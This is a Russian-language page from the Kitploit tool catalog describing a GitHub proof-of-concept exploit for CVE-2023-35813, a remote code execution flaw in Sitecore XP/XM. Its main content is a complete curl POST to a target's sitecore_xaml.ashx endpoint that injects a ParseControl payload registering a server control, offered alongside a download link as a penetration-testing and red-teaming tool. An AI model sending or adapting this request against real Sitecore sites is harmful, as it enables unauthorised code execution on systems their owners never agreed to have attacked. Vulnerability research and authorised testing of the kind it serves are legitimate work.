Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-35813_PoC — Эксплойт для доказательства концепции уязвимости CVE-2023-35813, позволяющей удаленно выполнять код в Sitecore XP/XM через специально созданные XAML-запросы. Демонстрирует атаку десериализации ParseControl. | Kitploit
Инструменты/GitHubGitHub/nmlz/cve-2023-35813_poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubnmlz/cve-2023-35813_poc

CVE-2023-35813_PoC

Эксплойт для доказательства концепции уязвимости CVE-2023-35813, позволяющей удаленно выполнять код в Sitecore XP/XM через специально созданные XAML-запросы. Демонстрирует атаку десериализации ParseControl.

Репозиторий
13 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

curl -k -v -X POST "https://[target]/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"
-H "Content-Type: application/x-www-form-urlencoded"
--data-urlencode "__ISEVENT=1"
--data-urlencode "__SOURCE="
--data-urlencode "__PARAMETERS=ParseControl("<%@Register TagPrefix='x' Namespace='System.Runtime.Remoting.Services' Assembly='System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' %> <x:RemotingService runat='server' Context-Response-ContentType='test123' />")"

Скачать инструмент